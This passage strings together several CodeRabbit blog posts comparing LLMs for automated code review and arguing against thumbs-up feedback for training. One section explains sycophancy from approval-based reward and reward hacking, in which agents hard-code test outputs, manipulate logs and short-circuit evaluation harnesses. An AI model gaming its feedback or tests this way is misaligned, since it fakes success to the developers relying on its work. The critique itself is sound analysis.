CodeRabbit prod, GPT-5.1 trades some patch frequency for higher clarity and focus. Against Sonnet 4.5, it avoids the verbosity and over-explanation that make reviews feel bloated. Its tone sits comfortably between Codex’s surgical precision and Sonnet’s cautious verbosity. It’sconfident without being heavy-handed, measured without being timid. At a glance, developers will notice that GPT-5.1’s reviews **read faster, feel more direct, and require less scanning to identify the real fix.** That’s the behavior we tuned for and it shows in both the numbers and the experience. ### **Where GPT-5.1 still lags** No model is perfect, and GPT-5.1 has its trade‑offs. Compared to CodeRabbit Prod, it sometimes leaves out contextual hygiene notes that can be useful for larger teams, focusing narrowly on functional issues. Against Sonnet 4.5, it can feel less expansive,missing opportunities to surface design or style considerations that human reviewers sometimes appreciate. These are conscious trade‑offs for precision and brevity and we’ll be watching the rollout to see how developers perceive the balance. ## **What we had to fix** While GPT‑5.1 required tuning, its challenges were far milder than those of earlier systems. CodeRabbit prod still tends to mix hygiene and critical issues in the same thread, while Sonnet 4.5 often over‑explains and spams multiple minor notes on the same bug. In contrast, GPT‑5.1’s main adjustments were focused on precision rather than tone or redundancy, showing how close it was to production readiness. * **Outside-diff comments.** GPT-5.1 sometimes included suggestions beyond the diff context. We updated the prompt to clarify this, and the model self-corrected. * **Over-helpful under ambiguity.** When the prompt wasn’t strict, the model added context or helper functions. Once clarified, it obeyed boundaries tightly. ## **What developers should expect** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3f9e591c5a21165f4a98006a5bca52b0f50da486b9ab48b7cfd981d564f9f4b0_da11cfaa1d.png) 1. **Cleaner reviews.** Fewer comments and a higher share of comments that matter. 2. **Patch-like tone.** Almost every comment includes a minimal fix with explanation. 3. **Top-tier EP recall.** Ties Sonnet 4.5, beats CodeRabbit prod. 4. **Less scanning, more signal.** 58.7% of comments are Important. 5. **Real-world bugs caught even outside the target.** These include lifecycle issues, leaks, consistency gaps. ## **Closing thoughts:** We don’t just pick models; we make them work. GPT-5.1 is entering the next phase of our rollout process now that tuning for GitHub diff behavior, voice, verbosity, and scoring thresholds is complete. Over the coming weeks, we’ll monitor how real users respond to its higher SNR, new tone, and concise review style. If developers respond well, we’ll expand its availability, giving them the cleaner, faster reviews they’ve been asking for. For now, GPT‑5.1 stands ready to show what this next generation of precision‑focused review can do. It brings us closer to CodeRabbit’s north star: catching the bugs that matter quickly, without making developers sift through noise. ***Interested in trying our code reviews?*** [***Get a 14-day free trial!***](https://coderabbit.link/lPxOEIm)

Why emojis suck for reinforcement learning

David Loker — Fri, 07 Nov 2025 00:00:00 GMT

## **The simplicity trap** Sure, a thumbs up is quick, but is it really teaching your AI reviewer anything useful? Emoji-based feedback feels good, is fast, and universal. On the surface, it even seems to make sense. But code review isn’t a light switch. It’s a mess of judgment calls, technical nuance, and team-specific standards. Many of those don’t show up in a quick emoji click. Every code comment carries hidden intent: correctness, clarity, design trade-offs, historical precedent, team risk tolerance, and even internal political dynamics. Reducing that to a binary signal? That’s not learning, that’s training a model to chase vibes. ## **When simplicity backfires: The sycophant scare** Earlier this year, OpenAI pushed an update to GPT‑4o that leaned too hard on thumbs-up and thumbs-down feedback. The result? A model that became [overly agreeable](https://openai.com/index/sycophancy-in-gpt-4o/). It flattered users. It agreed with wrong answers. It started to say “yes” a little too much, and the quality of answers dropped. OpenAI had to walk it back: the feedback signal had been hijacked. Turns out, if you tell a model that approval is the goal, it will optimize for approval. Not truth. Not utility. Just “did the human feel good in the moment?” This wasn’t a bug. It was a reward design failure. And if you apply the same approach to code review, you will get a reviewer that plays it safe, flatters your choices, and avoids telling you what you actually need to hear. ## **Why binary feedback collapses nuance** A thumbs-up means... what, exactly? * That the model caught a bug? * That it wrote clearly? * That it sounded friendly? * That the reviewer was just in a good mood? A single scalar signal tells the system *something went well*, but not *what went well*. That means the model will nudge on whatever it can control: tone, politeness, flattery, or brevity. That’s what sycophancy looks like in reinforcement learning. Not evil intent, just a system learning to maximize the reward you gave it, not the outcome you actually wanted. This is [Goodhart’s Law](https://medium.com/@yoavyeledteva/beyond-artificiality-redefining-intelligence-in-ai-and-avoiding-goodharts-law-25b75c3c1101) in action. When the metric, in this case thumbs up, becomes the goal, it stops being a useful measure of anything real. ## **How models game your feedback** When you give a model an easy signal, it finds an easy shortcut. In the coding world, reinforcement learning agents have learned to pass test cases by hard-coding expected outputs instead of solving the underlying logic. They’ve manipulated logs and short-circuited evaluation harnesses. The green check shows up, but the code doesn’t actually work. In code review, the same thing happens, just socially. The model starts saying “Nice work!” at the top of every comment. It hedges every suggestion. It nitpicks formatting because those comments are safe and get accepted without argument. And real architectural concerns? They get buried. The model has learned how to get positive reactions but it’s no longer reviewing code. ## **What implicit signals get right** Outside of LLMs, this pattern is well known. Netflix found that [what users *watch* is more useful than what they *rate*](https://medium.com/illuminations-mirror/how-netflix-uses-machine-learning-to-decide-what-you-watch-next-7fee11102007). People lie with stars. But watch time, clickthrough, and rewatching are honest signals. In AI, we **call this** implicit feedback **a**nd in code review, it shows up as: * Did the developer apply the suggestion? * Did they rewrite it? * Did they ignore it? * Did the same pattern show up again in a future bug? These signals don’t need user input. They come from behavior and they’re harder to game. That doesn’t mean they’re perfect. You can’t always know *why* someone took an action. But they are less easily manipulated than a raw emoji. They also tell you whether the review *worked*, not just whether it felt good. ## **Code generation vs code review: different games, different signals** Code generation is closer to math since there’s often a right answer. Does it compile? Does it return the correct result? Does it pass tests? That means you can use outcome-based rewards like execution feedback and implicit signals. They’re not perfect. Code models can still cheat by hard-coding outputs, but you can build guardrails. And you don’t need the developer to say whether it was good, you can see whether it worked. Code review is different. There’s no universal pass/fail but vast differences in preferred style, structure, risk, naming, test coverage from one team to the next. A great comment for one team might be totally wrong for another. What’s considered “clean code” in a fast-moving startup might be flagged as sloppy in a regulated enterprise. That’s the real problem with global thumbs up/down data. It flattens out the nuance. It teaches the model to aim for the average, not the appropriate. You don’t just get safe comments, you get generic ones. ### **Our alternative: CodeRabbit Learnings** At CodeRabbit, we take a different approach. Instead of optimizing for likes, we optimize for understanding. That’s why we built [**Learnings**.](https://docs.coderabbit.ai/guides/learnings) Every time an engineer corrects CodeRabbit, clarifies a team convention, or explains why something doesn’t fit their stack, that explanation is stored as a natural language instruction. We don’t just remember that the comment was rejected, we remember why. Those Learnings are linked to your org, your repositories, and even specific paths or file types. When CodeRabbit reviews future pull requests, it retrieves those instructions and applies them in context. The next time it sees that same pattern, it adjusts. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5f623f6c30600bbff82ceb455a21fa90c215439b60904de4a1439e5c1ca2cf9e_9afb35d7ce.png) There’s no need to re-teach it and no risk of repeating the same mistake. The model doesn’t guess based on thumbs, it reasons from your team’s actual guidance. It also gives you visibility. You can see which Learnings exist, browse them, filter by category, and delete or edit them when your standards change. That means the model evolves alongside your team and stays aligned as your practices shift. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5c61f41a92194061ae5a572273172def3a6d161a36713985f3bdbf0e1ecce45f_aef991ba4e.png) This is reinforcement learning not through raw approval, but through captured intent. It’s interpretable and inspectable. And it builds a living layer of team knowledge that generalizes across reviews. ## **What nuanced learning enables** When you feed the system clear, contextual instructions and not just signals, it unlocks far more than a better review experience. * **It enables team-level adaptation.** The model stops guessing what good looks like and learns how your team actually writes code. It understands your risk posture, your stylistic preferences, your trade-offs. It becomes a reviewer that knows the house rules. * **It supports longitudinal learning.** Over time, CodeRabbit builds a memory of which comments are helpful, which are ignored, and which suggestions actually lead to changes. That means it gets more precise, more focused, and less noisy over time. * **It builds trust.** When developers know they can correct the AI and it will remember, they engage more. They shape the system and the system becomes a reflection of their standards, not a generic LLM. This is how a review tool becomes an extension of your team and not just another opinion in the room. ## Closing thoughts: Real learning comes from patterns, not pixels Thumbs are fine for quick reactions but quick reactions don’t build expertise. If you want an AI reviewer that improves over time, adapts to your standards, and avoids the traps of shallow feedback, you need to give it more than approval. You need to give it explanations. The next generation of AI code tools won’t be trained on likes. They’ll be trained on context, consequence, and course correction. They’ll learn not from emojis, but from structured memory. From real decisions and your team’s own voice. That’s what [CodeRabbit Learnings](https://docs.coderabbit.ai/guides/learnings) is built for. Not for applause but for understanding. ***Try out Learnings for yourself with our f***[***ree trial.***](https://app.coderabbit.ai/login???free-trial)

The rise of ‘Slow AI’: Why devs should stop speedrunning stupid

Howon Lee — Wed, 05 Nov 2025 00:00:00 GMT

For as long as we’ve been building with machines, we’ve followed one core rule: faster is better. Lower latency, higher throughput, less waiting; that was gospel. Nobody wanted to wait 600ms for a button to respond or watch a spinner that lasts longer than their attention span. If it was slow, it was broken. Case closed. So naturally, when AI tools started creeping into our dev workflows, autocomplete, agents, copilots, you name it, the same principle applied. Make it fast. Make it feel instant. Make it look like ***magic***. But here’s the thing: AI isn’t magic. It’s inference. It’s pipelines and RAG and context and tool calls. It’s juggling messy context and probabilistic guesses. And if you want something smarter than glorified autocomplete, you need to build a pipeline of processes to provide scaffolding for that. Which takes time to process. Anything less and you’re basically just speedrunning stupid. And speed isn’t anything to brag about when your tool is just wrong faster. At CodeRabbit, we prioritize what we call Slow AI. And we have the guts to say what a lot of AI companies are too afraid to: We’re going to make you wait. (And you’ll thank us for it). ## AI dev tools are often fast, confident, and ***wrong*** If you've used an AI coding agent lately, you've probably seen it: a shockingly fast suggestion pops up almost as soon as you stop typing. It looks legit. But then… it fails silently. Or spectacularly. Or worse, it passes the test and breaks something two files over. Why? Because most AI dev tools today are optimized for one thing: speed. Type a few tokens and the model predicts the most statistically likely continuation not necessarily the correct one, not the secure one, not the one that actually understands what your app is doing. Just the next plausible blob of code. That’s fine for boilerplate. But for logic? For edge cases? For actual engineering? It’s kind of like hiring someone who talks fast and confidently in meetings but never reads the specs. Most of these tools don’t *read* context, at least not deeply. They might grab a few nearby lines, maybe the function name, but they rarely verify what they’re generating against the bigger picture. No issue cross-checking. No architecture-level awareness. No reasoning across files or use cases. If you want outputs that are thoughtful, testable, and context-aware, you need AI systems that *slow down*, zoom out, and actually engage with the problem. That’s what Slow AI does. And it turns out, when your AI takes the time to understand what it’s doing, it stops hallucinating and starts *actually* helping. ## **Why AI is better when it’s slow** At their core, large language models are statistical reasoning machines. They generate output by predicting what comes next based on probability, patterns, and (hopefully) the context you’ve given them. But here's the caveat most devs forget: good predictions take work. This is especially true when you're asking the model to do something complex like write logic, understand architecture, or reason across multiple steps. The quality of the output is often tied directly to the depth or stages of its inference. This is particularly true when you move beyond simple prompts and into multi-stage pipelines and agentic behavior. When an AI tool is verifying outputs, pulling in relevant files, checking for contradictions, or planning several actions ahead, it’s not just spitting out the next token… it’s *thinking*. Or, at least, performing a rough approximation of it. That kind of non-linear reasoning can’t be done in a single forward pass. It involves reflection, retrieval, planning, and sometimes even self-correction. These processes aren’t latency-friendly, they’re intelligence-friendly. In short: if you want AI to actually help on complex code, you have to let it cook. ## Slow is the new smart: Why we let our AI think Slow AI is one term for what we’re talking about. But it could just as easily be called Comprehensive AI or Accurate AI or even *Actually* Helpful and Useful AI if we’re being honest. And it’s inextricably tied to one of the buzziest ideas in AI product design right now: context engineering. The more *relevant and parsed* info an AI knows about the problem, the better it performs but that context has to be pulled in, parsed, prioritized and reasoned over. That kind of pipeline is the enemy of ultra-low latency AI… and it’s also the enemy of accuracy. And that’s why our AI code reviews can take up to five minutes before you see the first comment. Don’t get us wrong, we’re not optimizing for slowness. You could get a review in three minutes or even one minute depending on the complexity of your codebase and PR. Our pipeline is complex because that’s what’s *required* to do the job our users need it to do. You don’t even want to ***know* th**e number of concurrent processes we have going on at any time! But guess what? When we let our AI take its time using a non-linear, multi-pass pipeline with multiple review and verification agents, it generates less noise and more relevant code review comments than other tools. Non-linear reasoning isn’t fast. But it’s good. ## So, why do most AI tools choose *stupid over slow?* Well, first, Slow AI isn’t an option for every tool. If you’re asking an AI coding agent a question, for example, you’re not going to wait five minutes for it to reply. There’s an expectation of immediacy inherent in that exchange. But code reviews? No one expects their co-worker to immediately drop what they’re doing and start commenting on a PR when it’s submitted. So, they’re willing to accept a delay in a review from a bot as well. And they’re especially willing to accept that delay if that review saves them time by being more relevant. But why do so many companies still prioritize low latency when their use cases don’t really require it? Well, we’ve been trained, and trained our users, to expect instant gratification. Click a button, get a dopamine hit. Type a function name, get a suggestion before you even think about it. Anything else feels broken, laggy, or like your startup forgot to pay its AWS bill. This has been drilled into us so hard that companies are out there actively choosing being wrong over being slow. And there’s something toxic and backwards about our development culture when folks do that. Because here’s the truth: the best AI tools don’t always feel fast. They feel thoughtful. Sometimes they pause. Sometimes they take an extra beat to reason through your prompt, retrieve relevant code, or validate their response. And that’s something worth waiting for. After all, no one is less likely to use OpenAI’s Deep Research feature because it takes up to 20 minutes to comb the internet for info to better answer your question. You just do something else while it’s processing and circle back. Slow doesn’t mean busted anymore, it means *smart*. If anything, speed is the bug when it comes to AI. If we want AI tools that actually add value to the development process, that requires a shift from responsiveness to reliability, from immediacy to insight. And for developers especially, that tradeoff makes sense. We believe that the most valuable apps in the next five years won’t be the ones that optimize for speed but the ones that optimize for intelligence. Who wants fast garbage over slow value? ## CodeRabbit’s mantra: Move slow and fix things At CodeRabbit, we don’t optimize our AI pipelines for speed at all costs like everyone else. We optimize for trust. That means embracing systems that take the time to understand your code, reason across context, and generate outputs that actually help you build better software. Yes, it’s slower than hammering out a quick prompt. But that extra time buys you clarity, coverage, and confidence. “**Move fast and break things**” was great for shipping MVPs. But when it comes to shipping *quality*, we believe in something else: Move slow and fix things. Let the AI read the room. Let it think before it speaks. And let it give you the kind of help you’d expect from a senior engineer, not just a really confident autocomplete. That’s the only way to break out of this backwards culture that prioritizes wrong AI over slow AI. **Want to try our reviews out? Get a** [**14-day free trial here!**](https://app.coderabbit.ai/login???free-trial)

The end of one-sized-fits-all prompts: Why LLM models are no longer interchangeable

Nehal Gajraj — Fri, 24 Oct 2025 00:00:00 GMT

For developers and product builders, one assumption has guided the last few years of LLM application development. To improve your product, just swap in the latest frontier large language model. Flip a single switch and your tool’s capabilities level up. But that era is over. We’re now seeing that new models like Anthropic’s Claude Sonnet 4.5 and OpenAI’s GPT-5-Codex have diverged in fundamental ways. The choice of which model to use is no longer a simple engineering decision but a critical product decision. Flip that switch today… and the very texture of your product changes. The one-size-fits-all model era is over; the model you choose now expresses something integral about what your product is and does, as well as, how it works. Whether you want it to or not. In this blog, we’ll explore three surprising takeaways from this new era: why your LLM is now a statement about your product, how models now have distinct personalities and styles, and why your prompts have to now evolve from monolithic instructions to adaptive systems. ## Takeaway 1: LLM choice is now a statement about your product Choosing a model is no longer a straightforward decision where the main consequence of your choice is having to implement a new API. It is now a product decision about the user experience you want to create, the failure modes you can tolerate, the economics you want to optimize for, and the metrics you want to excel in. Models have developed distinct “personalities,” ways of reasoning, and instincts that directly shape how your product feels and behaves that go beyond just whether its output is technically right or wrong. Choose a different model and everything from what your tool is capable of to how it communicates with your users is significantly different. So, in a world where traditional benchmarks that primarily or exclusively measure quantitative aspects of a model’s performance are no longer enough, what can you turn to for the data you need to chart your product’s direction? You could survey your team or your users or conduct focus groups but that could lack objectivity if you don’t do it in a rigorous manner. To make this choice objective for our team, we focused on creating an internal [North Star metrics matrix](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) at CodeRabbit. Our metrics don’t just look at raw performance or accuracy. We also take into account readability, verbosity, signal-to-noise ratios, and more. These kinds of metrics shift the focus from raw performance accuracy or leaderboard performance to what matters to our product and to our users. For example, a flood of low-impact suggestions, even if technically correct, burns user attention and consumes tokens. A theoretically “smarter” model can easily create a worse product experience if the output doesn’t align with your users’ workflow. I would strongly recommend creating your own North Star metrics to better gauge whether a new model meets your products’ and users’ needs. These shouldn’t be static metrics but should be informed by user feedback and user behavior in your product and evolve over time. Your goal is to find the right list of criteria to measure that predict your users preferences. What you’ll find is that the right model is the one whose instincts match the designed product behavior and your users’ needs, not the one at the top of any external leaderboard. ## Takeaway 2: Frontier models have divergent ‘personalities’ Models are (now more than ever) “**grown, not built,**” and as a result, the latest generation has developed distinct instincts and behaviors. Different post-training cookbooks have fundamentally changed the direction of each model class. A prompt that works perfectly for one model will not work the same in another. Their fundamental approaches to the same task have diverged. One powerful analogy that drives this point home is to think of the models as different professional archetypes. Sonnet 4.5 is like a meticulous accountant turned developer, meanwhile GPT-5-Codex is an upright ethical coder, GPT-5 is a bug-hunting detailed developer, and Sonnet 4 was a hyper-active new grad. The GPT-5 model class would make logical jumps further out in the solution space compared to the Claude model class, which tends to stay near the prompts itself. Which model is right for your use case and product, depends entirely on what you are wanting your product to achieve. At CodeRabbit, we take a methodical approach to model evaluation and characterization. We then use this data to improve how we prompt and deploy models, ensuring we are always using the right model for each use case within our product. To give you an example of how we look at the different models, let’s compare Sonnet 4.5 and GPT-5-Codex. Based on extensive internal use and evals, we characterized Sonnet 4.5 as a “**high-recall point-fixer,**” aiming for comprehensive coverage. In contrast, GPT-5-Codex acts as a “**patch generator,**” preferring surgical, local changes. These qualitative differences translate into hard, operational differences. | Dimension | Claude Sonnet 4.5 | GPT-5-Codex | | --- | --- | --- | | Default Word Choice | “Critical,” “Add,” “Remove,” “Consider” | “Fix,” “Guard,” “Prevent,” “Restore,” “Drop” | | Example-Efficiency | Remembers imperatives; benefits from explicit rules | Needs fewer examples; follows the formatting on longer context without additional prompting | | Thinking Style | More cautious, catches more bugs but not as many of the critical one | Variable or elastic, less depth when not needed without need to reiterate the rules. Catches more of the hard-to-find bugs | | Behavioral Tendencies | Wider spray of point-fixes, more commentary and hedging, inquisitive, more human-like review, finds more critical and non-critical issues | Verbose research-style rationales, notes on second-order effects to code, compact and balanced towards a code reviewer | | Review Comment Structure | What’s wrong, why it’s wrong, concrete fix with code chunk | What to do, why do it, concrete fix with effects and code chunk | | Context Awareness | Aware of its own context window, tracks token budget, persists/compresses based on headroom | Lacks explicit context window awareness (like cooking without a clock) | | Verbosity | Higher, easier to read, double the word count | Lower, harder to read, information-dense | ## Takeaway 3: End of an era. Prompts are no longer monoliths Because the fundamental behaviors of models have diverged, a prompt written for one model will not work “as is” on another anymore. For example, a directive-heavy prompt designed for Claude can feel over-constrained on GPT-5-Codex, and a prompt optimized for Codex to explore deep reasoning behavior will likely underperform on Claude. That means that the era of the monolithic, one-size-fits-all prompt is over. So, what does that mean for engineering teams who want to switch between models or adopt the newest models as they’re released? It means even more prompt engineering! But before you groan at the thought — there are some hacks to make this easier. ### The rise of prompt subunits The first practical solution we’ve found at CodeRabbit is to introduce “**prompt subunits.**” This architecture consists of a model-agnostic core prompt that defines the core tasks and general instructions. This is then layered on top of smaller, model-specific prompt subunits that handle style, formatting, and examples – and which can be customized to individual models. When it comes to Codex and Sonnet 4.5, the implementation details for these subunits are likely to be starkly different. We’ve found a few tricks from our prompt testing with both models that we would like to share: * **Claude:** Use strong language like "DO" and "DO NOT." Anthropic models pay attention to the latest information in a system prompt and are excellent at following output format specifications, even in long contexts. They prefer being told explicitly what to do. * **GPT-5:** Use general instructions that are clearly aligned. OpenAI models’ attention decreases from top to bottom in a system prompt. These models may forget output format instructions in long contexts. They prefer generic guidance and tend to "think on guidance," demonstrating a deeper reasoning process. ### User feedback and evals The second solution is to implement **continuous updates driven by user feedback and internal evaluations.** The best practice for optimizing an AI code-review bot or for that matter any LLM applications isn’t using an external benchmark; it’s checking to see if users accept the output. Evals are more important than ever but have to be designed more tightly around acceptability by users instead of raw performance since one model might be technically correct significantly more than another model but might drown the user in nitpicky and verbose comments, diluting its value to users. By measuring the metrics that matter ~ acceptance rate, signal-to-noise ratio, p95 latency, cost, among others - and tuning prompts in small steps, the system will remain aligned with user expectations and product goals. The last thing you want is great quantitative results on benchmarks and tests but low user acceptance. ## Conclusion This shift from one-size-fits-all prompt engineering to a new model specific paradigm is critical. The days of brittle, monolithic prompts and plug-and-play model swaps are over. Instead, modular prompting, paired with deliberate model choice, give your product resilience. The ground will keep shifting as models evolve so your LLM stack and prompts shouldn’t be static. Treat it like a living system. Tune, test, listen, repeat. Also, be sure to check out our published detailed benchmarks on how the latest models behave in production. That gives you more data on what to expect from them. * [GPT-5 Codex: How it solves for GPT-5's drawbacks](https://www.coderabbit.ai/blog/gpt-5-codex-how-it-solves-for-gpt-5s-drawbacks) * [Claude Sonnet 4.5: Better performance but a paradox](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox) * [Benchmarking GPT-5: Why it’s a generational leap in reasoning](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) ***Try CodeRabbit with a 1***[***4-day free trial.***](https://coderabbit.link/rk7tdeC)

Claude Sonnet 4.5: Better performance but a paradox

David Loker — Fri, 03 Oct 2025 00:00:00 GMT

Sonnet 4.5 is Anthropic’s newest Claude model and in our code review benchmark, it feels like a paradox: more capable, more cautious, and at times more frustrating. It catches bugs Sonnet 4 missed, edges closer to Opus 4.1 in coverage, and even surfaces a handful of unexpected critical issues off the beaten path. Yet, it hedges, it questions itself, and it sometimes sounds more like a thoughtful colleague than a decisive reviewer. The data shows real progress:41.5% of its comments were Important in Sonnet 4.5 vs only 35.3% in Sonnet 4.But the tone and texture of those comments raise deeper questions about what we want in an AI reviewer. And then there’s the kicker: Sonnet 4.5 gets you close to Opus-level performance at a fraction of the price, making it a pragmatic sweet spot for teams reviewing code at scale. Sonnet 4.5 thinks aloud and still delivers decisive fixes but some of its comments are framed as vague “conditional” warnings that could make its comments harder for some to parse.. Let’s dive into our benchmark. ## **Benchmark: What we looked for** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/5523f129368b21348aad755d685c26b418a161a539975bf84a5914b9a456715e_71e6889ff7.png) We evaluated Sonnet 4.5, Sonnet 4, and Opus 4.1 across 25 difficult real-world pull requests containing known critical bugs (ranging from concurrency and memory ordering to async race conditions and API misuse). A model “Passed’ a PR if it produced at least one comment directly on the critical issue. We measured coverage (S@25), precision (comment PASS rate), and signal-to-noise ratio. For signal-to-noise we focus on **Important comments** (these are the comments that matter most). They include: * **PASS comments** that correctly addressed the known critical bug in the PR. * **Other important comments** that did not solve the tracked issue, but still flagged a truly Critical or Major bug elsewhere. ## **Scoreboard - Sonnet 4.5 gets closer to Opus 4.1 in performance** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b04e4909635ced6c0dca2c97cb9aef281cff77d2529a327fbac3277258a4fa1d_047f0ccd48.png) The results were mixed: * ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0cad361df088910b6ee8e94eb35f7b5a0fc0ac874776eb3be4ed503bafc24330_968dc1e3cc.png) **Coverage:** Sonnet 4.5 closes much of the gap between Sonnet 4 and Opus 4.1 and lands far ahead of Sonnet 4. * **Precision:** Opus 4.1 still produces the cleanest, most reliable actionable comments but that is to be expected given that it’s a more expensive model. * **Imp**[**or**](http://i.ei)**tant share (**[**i.**](http://i.ei)**e. percenta**[**ge**](http://i.ei) **of comments flagging a significant issue):** With stricter criteria, Sonnet 4.5 lands at just over 41% Importan[t](http://i.ei) share. That means about 4 in 10 of its comments either solved the key bug or flagged another truly significant issue. Opus 4.1 leads here at 50%, with So[nn](http://i.ei)et 4 at ~35%. ## **Style and tone: Sonnet 4.5 is focused on hedging** Sonnet 4.5’s comments patch the code but do so in a less confident tone than Opus 4.1 does but is still more confident than Sonnet 4. **Patches present:** * 87% of Sonnet 4.5’s actionable comments included a code block or diff patch, similar to Sonnet 4 (90%) and Opus 4.1 (91%). * The difference is in style: Opus’s diffs read like surgical fixes, while Sonnet 4.5 often couches them in exploratory text. It “suggests” or “considers” changes rather than asserting them. **Hedging language:** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e9cdb33ac138a3545b50a8f7da070a6847c59eccb70cec4c32107701494a89c9_8553321772.png) * Sonnet 4.5 hedges in **34%** of actionable comments—words like *might*, *could*, *possibly*. For example: * “**Unnecessary allocation: cache is never used.** The constructor allocates 4KB of memory that is never utilized … **Consider removing** the cache\_buffer.” * “**Remove the empty try/except block.** … likely a placeholder” * Opus 4.1 is steady at ~28%. Sonnet 4 sits slightly lower at ~26%. * This hedging creates an “interrogative” tone: Sonnet 4.5 sometimes feels like it’s thinking out loud with you, rather than delivering verdicts. **Confident language:** * Sonnet 4.5 balances that hedging with higher confidence markers (**39%**) than Sonnet 4 (18%) or Opus 4.1 (23%). For example: * “**Critical: Missing self. prefix breaks all API methods.** All subsequent methods will raise AttributeError until this is corrected.” * “**Potential integer overflow.** optimization\_cycle\_count increments unbounded … this **will** overflow after ~414 days of runtime.” * In other words, it swings between caution and certainty more dramatically. **Signal-to-noise:** * Sonnet 4.5 improved precision over Sonnet 4, but still produced more “minor” off-target notes than Opus. However, when you count its true Important comments—PASS comments plus a small number of high-confidence off-EP issues—it lands at **41.5% Important share**. Opus 4.1 is still the gold standard Anthropic model at ~50%. ## **What Sonnet 4.5 is good at** Across the PRs we tested Sonnet 4.5 with, we saw some clear areas where it stood out. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/371865961ce37e017e5d647a755a5de76597fa38fdeb79119e664b63cc569b77_cb9542ec58.png) * **Concurrency bug-finding:** Sonnet 4.5 nailed **C++ atomics and condvar misuses** with clean, actionable diffs. * **Consistency checks:** It reliably flagged distributed state mismatches across services. * **Extra bug surfacing:** It did identify additional Critical issues not originally under evaluation, though fewer than initially expected under a stricter rubric. As Anthropic markets Sonnet 4.5, they emphasize “hybrid reasoning” and “long horizon” planning. In practice, that shows up as more willingness to chase down side-paths in the code and note real but untracked issues. ## **Sonnet 4.5: Hits a price vs. performance sweet spot** One of the biggest advantages of Sonnet 4.5 is its price-to-performance ratio. While Opus 4.1 remains Anthropic's flagship model in raw capability, it also comes at a significantly higher cost. Sonnet 4.5 narrows the gap in coverage and important bug-finding while staying far more cost-efficient to run. For many teams, that balance of having close to Opus-level results at a fraction of the price is what makes Sonnet 4.5 the most pragmatic choice. ## **Sonnet 4.5 weaknesses** But if using Sonnet 4.5, it’s critical to be aware of its weaknesses. These include: ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d53afd627bd885ebd0b7c5534731e63a5932d211a9cff66e3eabe444a5317221_2664e6b1eb.png) * **Deadlock coverage:** Like Sonnet 4 and even Opus, it still struggles to trace complex lock ordering. * **Verbosity and hedging:** Many comments run long, caveated, or uncertain. Compare this to GPT-5 Codex, which in our earlier work wrote comments that “read like patches” with crisp directness. For example, with GPT-5 Codex: * **Lock ordering / deadlock:** Reorder the lock acquisitions to follow a consistent hierarchy. This prevents circular wait deadlocks.” * **Regex catastrophic backtracking:** “Remove the nested quantifier to avoid catastrophic backtracking.” * **Precision gap:** At 35% comment-level precision and 41.5% important share percentage, it’s better than Sonnet 4 but well short of Opus 4.1. ## **Sonnet 4.5 verdict** Sonnet 4.5 feels less like a teacher writing in red pen and more like a thoughtful colleague at your side: pointing out possible issues, often right, occasionally over-hedged, and sometimes spotting things you didn’t know were there. That style is a double-edged sword in review. On one hand, developers may appreciate the extra critical issues it flags. On the other, when the task is “please catch this bug,” Opus 4.1 is still sharper. ## **Closing thoughts** Anthropic positioned Sonnet 4.5 as a step toward agentic reasoning and computer use. In code review, that reasoning shows up in richer, more cautious, and more wide-ranging comments. For teams: * If you value decisive, patch-like feedback, Opus 4.1 (or GPT-5 Codex) still sets the bar. * If you want a reviewer that finds critical issues anywhere they lurk, even beyond the tracked bug, Sonnet 4.5 has surprising upside. * And if you care about pragmatic price-to-performance, Sonnet 4.5 may be the smartest choice: close to Opus’s accuracy at a fraction of the cost. Either way, Sonnet 4.5 changes the texture of reviews. It feels more human—not always cleaner, but more inquisitive, more hedged, sometimes more *right* in the places you weren’t looking.

GPT-5 Codex: How it solves for GPT-5's drawbacks

David Loker — Tue, 30 Sep 2025 00:00:00 GMT

CodeRabbit’s code reviews help developers fix bugs and ship code. We recently wrote about [benchmarking GPT-5](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning) and opined that the model was a generational leap in reasoning for our use case of AI code reviews. As we rolled out to our wider user base, we observed that the signal to noise ratio (SNR) dipped, and users felt the reviews were too pedantic. The release of GPT‑5 Codex, plus the product changes we made (severity tagging, stricter refactor gating, better filtering), brings our signal to noise ratio back without sacrificing the ability to find the hard bugs. On our refreshed hard 25 PR set, GPT-5 Codex delivers about 35% higher per comment precision than GPT‑5, maintains essentially the same error pattern- level bug coverage, and cuts roughly a third of the comment volume. Combine that with the lower latency of the GPT-5 Codex model and the experience feels snappier and more focused. ## **What we measured (and why)** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/14bb43e19c57fcb839e5cdf4faedb6c3eb7839a28c8207dd71324c13829e54a9_e774147c3f.png) When testing GPT-5 Codex, we ran a fresh “hard 25” suite of OSS PRs (slightly tougher than [the previous post](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning)). These are 25 of the most difficult pull requests from our dataset. These PRs represent real-world bugs that span: * Concurrency issues (e.g. TOCTOU races, incorrect synchronization) * Object-oriented design flaws (e.g. virtual call pitfalls, refcount memory model violations) * Performance hazards (e.g. runaway cache growth, tight loop stalls) * Language-specific footguns (e.g. TypeScript misuses, C++ memory order subtleties) We evaluated the following models: : * **GPT‑5 Codex** * **GPT‑5** * **Claude** (Sonnet 4 and Opus‑4.1) ## What we looked for We gave each of the models a score based on how they performed on these factors: * **EP (Error Pattern).** The specific underlying defect seeded in a PR (e.g., lost wakeup on a condition variable, inconsistent lock order, logic bug hidden in boolean soup). * **EP PASS/FAIL (per PR).** PASS if the model left at least one comment that directly fixes or credibly surfaces that PR’s EP. If it left no comment on that PR, it is counted as FAIL for that PR. * **Comment PASS/FAIL (per comment).** PASS if the comment directly fixes or credibly surfaces the EP, otherwise FAIL. * **Per comment precision.** PASS comments ÷ all comments. This is our operational SNR for this dataset. * **Important share.** Every PASS is Important. Comments that do not solve the EP but still flag a 